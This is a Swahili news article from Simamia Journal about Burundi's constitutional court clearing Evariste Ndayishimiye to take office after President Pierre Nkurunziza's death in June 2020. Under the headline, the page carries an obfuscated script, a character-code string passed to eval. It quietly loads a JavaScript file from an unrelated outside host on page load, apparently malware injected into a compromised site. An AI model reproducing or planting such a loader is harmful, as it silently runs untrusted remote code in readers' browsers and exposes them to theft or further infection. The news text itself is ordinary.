Recent Comments

RASMI NI EVARISTE NDAYISHIMIYE IKULU YA NTARE RUSHATSI!

By Simamia Journal Jun 12, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

RASMI NI EVARISTE NDAYISHIMIYE IKULU YA NTARE RUSHATSI!

Na; Leonard Chakupewa Twin Chaks Jr.
Bujumbura, Burundi
Juni 12, 2020.

Utata uliokuwepo juu ya mustakabali wa uongozi wa taifa la Burundi baada ya kifo cha rais Pierre Nkurunziza, umemalizwa. Hivyo ndivyo mtu awezavyo kuanza kusema.

Mapema hii leo, Mahakama ya katiba nchini hapa, imetamka rasmi taifa kutokuwa na kiongozi mkuu na kutoa ruhusa kwa hatua ya uapishwaji rais mteule, Meja Jenerali (Mstaafu) Evariste Ndayishimiye hivi karibuni, tayari kuanza majukumu kama Rais wa taifa pia Amiri Jeshi Mkuu wa Majeshi ya Ulinzi na Usalama.

Itakumbukwa kwamba siku ya tarehe 11 Juni, 2020, Baraza la Mawaziri liliketi chini ya uongozi wa Makamu wa kwanza wa rais, Bw. Gaston Sindimwo sambamba na mwenzake Dk. Joseph Butore, kujadili mwenendo wa namna taifa litakavyoendeshwa kuanzia sasa. Katika kikao hicho, baraza liliwaomba Makamu hao wawili kuiandikia barua Mahakama ya katiba kuiomba kutangaza nchi kutokuwa na kiongozi na kuruhusu mchakato wa uapishwaji kiongozi mpya.

Awali ilibainishwa kuwa, Spika wa Bunge la chini wa sasa, Bw. Paschal Nyabenda, angeongoza serikali ya mpito (interm government) hadi Agosti 20 mwaka huu, ambapo ndipo rais mpya angeapa. Hivyo ndivyo Katiba inavyoelekeza. Hata hivyo, kutokana na hali ya mambo, Mahakama hiyo ambayo ndio msimamizi mkuu wa Katiba, ikiwa na uwezo wa kuhuisha au kubatilisha kifungu chochote ndani yake, imeona yafaa kiongozi huyo mshindi wa uchaguzi mkuu uliomalizika Mei 20 mwaka huu.

Juni 9, 2020, serikali ilitangaza kifo cha aliyekuwa kiongozi wa taifa kwa kipindi cha miaka 15, Bw. Pierre Nkurunziza katika hospitali ya Fiftieth Anniversary mkoani Karuzi. Hayati rais huyo alifariki tarehe 8 Juni, 2020, kwa maradhi ya moyo, akiwa na umri wa miaka 55 tu.

Haijabainishwa hasa ni lini na wapi kiongozi huyo mteule ataapia, lakini ni wazi itakuwa mapema sana kwa kuwa kikatiba hairuhusiwi taifa kukaa muda mrefu bila kuwa na Kiongozi mkuu.

Tusubiri kufahamu zaidi baadae.

Mungu ailaze kwa amani roho ya Rais Pierre Nkurunzia!

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv